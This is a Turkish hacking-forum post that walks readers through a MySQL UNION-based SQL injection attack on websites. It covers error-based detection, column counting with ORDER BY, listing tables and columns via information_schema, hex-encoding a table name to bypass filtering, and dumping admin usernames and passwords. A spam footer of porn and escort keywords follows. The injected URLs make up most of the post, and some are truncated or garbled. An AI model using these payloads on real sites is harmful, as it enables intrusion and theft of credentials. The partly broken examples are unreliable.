KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Sql İnjection Anlatım
Konu : Sql İnjection Anlatım - 27.10.2014, 20:47
Mesaj: #1
Anlatım: Black-Shadow

SQL İnjection Anlatımı:

Arkadaşlar Anlatım Tamamen Bana Aittir Haydi Başlayalım Bu Açığı Kesinlikle Küçük Görmeyin Bu Açık Devlet Sitesinde Bile
Olabilecek Tür’den Bir Açık.

MySQL İnjection’dan Başlıyalım

http://blackshadow.com/profile.php?id=1’

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’\\\\-’ at line 1
Hatamız Gelirse Bilin ki Ahanda Sql Açığı Sql Açığını Tespit Etmek İçin ’a ’ Koymanız Yeterli.
Gelin Kolon Sayımızı Öğrenelim Ne Dersiniz

http://www.blackshadow.com/profile.php?id=1+order+by+31

31 Yazdık Ve Hata Verdi.Şimdi Hata Vermeyene Kadar Aşşağı ineceğiz.

http://www.blackshadow.com/profile.php?id=1+order+by+31
http://www.blackshadow.com/profile.php?id=1+order+by+30
http://www.blackshadow.com/profile.php?id=1+order+by+29
http://www.blackshadow.com/profile.php?id=1+order+by+28

28 De Ekran Düzeldi Demekki Kolon Sayımız 28

Şimdi Kolonları Ekrana Yansıtalım.


http://www.blackshadow.com/profile.p...24,25,26,27,28

Kolon Sayımız 28 Olduğu için union+select+...28 e kadar yazıyoruz.

Ekrana 5,9 Kolonları Yansıdığını Varsayarak Devam Ediyoruz.

Ha Arkadaşlar Anaa Baktınız Yansımadı Hiiç Korkmayın (--)Yapın. Buna Bypass Diyebilirsiniz.

Şimdi Version İsteyelim.

http://www.blackshadow/profile.php?id=-1 union select 1,...,version(),15,16,17,18,19,20 ,21,22,23,25,26,27

14.0.91mm-log Yazdırdık.Hangi Numara İle Başlarsa Versionu odur..Yani 14.


Şimdi İse Database den Tabloları alalım.

http://www.blackshadow.com/profile.php?id=-1 union select 1,......,group_concat(table_name),15,16.... from information_schema.tables where table_schema=database()

Tablolarımız Bunlar Olsun :


+---------------------+
| admin|
| kullanıcı|
| dosya_isimleri |
| externallinks |
| haber|
| araba |
| spiker |
| konuklar |
| presskit |
+---------------------+


adminuser = Bunu Gördüysen Hedefe Yaklaştın Demektir.

Şimdi Tablodan Column’ları Çekelim.

http://www.blackshadow.com/profile.php?id=-1 union select 1,.....,group_concat(column_name),15,16.... from information_schema.columns where table_schema=database() and table_name='adminuser'

Bu Şekilde Yazdık Ama Hata Verdi.Çünkü adminuser den Kolonları İstediğimizde Bi Tür Engel Çıktı.Yani Yansıtamadık.Bunu Gidermek İçin adminuser i Hex leyeceğiz.

Hex Converter

http://www.dolcevie.com/js/converter.html Girin.



Sonucumuz 61:64:6d:69:6e:75:73:65:72 Bu Şekilde Çıkacak Ama Biz Onu 0x61646d696e75736572 Bu Şekilde Yapacağız.Yani iki noktaralı silip Başına *** Koyacağız.

http://www.blackshadow.com/profile.p.....6e75736572--

Evet Bu Şekilde.Şimdi Verilerimizi Çekelim.


username
password


Olsun

http://blackshadow.com/profile.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,username,14,15,passw ord,17 from adminuser--

Ve Bitişi Yapalım :


SQL: Kullanıcı Adı
İnjection : Şifre

Arkadaşlar Eksiğim Kusurum Var ise Hakkınızı Helal Edin Umarım Doğru Bir Makale Olmuştur
 

Alıntı ile Cevapla
Konu : Sql İnjection Anlatım - 02.12.2014, 22:27
Mesaj: #2
teşekkürler...

Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno